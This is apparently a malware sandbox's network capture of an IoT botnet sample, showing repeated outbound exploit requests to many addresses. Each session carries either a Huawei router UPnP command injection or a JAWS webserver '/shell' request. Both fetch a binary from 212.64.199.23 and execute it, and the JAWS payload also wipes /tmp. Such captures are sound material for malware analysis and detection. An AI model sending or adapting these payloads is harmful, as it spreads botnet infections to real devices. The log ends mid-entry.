                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          57192.168.2.153394813.108.32.21180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.687750101 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          58192.168.2.1535530156.161.111.24737215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.687851906 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          59192.168.2.153783435.149.142.16380
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.719587088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          60192.168.2.1544860156.66.193.9337215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.719693899 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          61192.168.2.1543492203.195.122.9880
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.751632929 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          62192.168.2.1556618163.191.21.18380
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.815670967 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          63192.168.2.153720267.218.78.19180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.847596884 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          64192.168.2.1549602216.213.46.23180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.849183083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          65192.168.2.1556388166.138.238.3580
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.879929066 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          66192.168.2.1543514107.223.216.24080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.881738901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          67192.168.2.1540134150.170.24.9080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.911725998 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          68192.168.2.1541766124.184.212.22780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:17.913489103 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          69192.168.2.154199225.233.224.3880
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.494579077 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          70192.168.2.155796651.139.218.3680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.496550083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          71192.168.2.154239298.228.221.17680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.498265982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          72192.168.2.1546296139.225.240.17280
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.500096083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          73192.168.2.1545680176.100.12.17680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.501720905 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          74192.168.2.1536874152.23.93.4580
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.503546953 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          75192.168.2.154999862.3.220.6680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.505476952 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          76192.168.2.155830895.141.34.8680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.507658005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          77192.168.2.1537782156.181.117.10337215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.685679913 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          78192.168.2.1538036156.87.226.22737215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:18.687688112 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          79192.168.2.154955632.109.104.680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.353151083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          80192.168.2.1556370197.206.55.4637215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.417109013 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          81192.168.2.1552170156.166.231.24337215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.427774906 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          82192.168.2.154854619.119.179.10780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.487170935 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          83192.168.2.15337649.119.226.18580
                                                          TimestampBytes transferredDirectionData
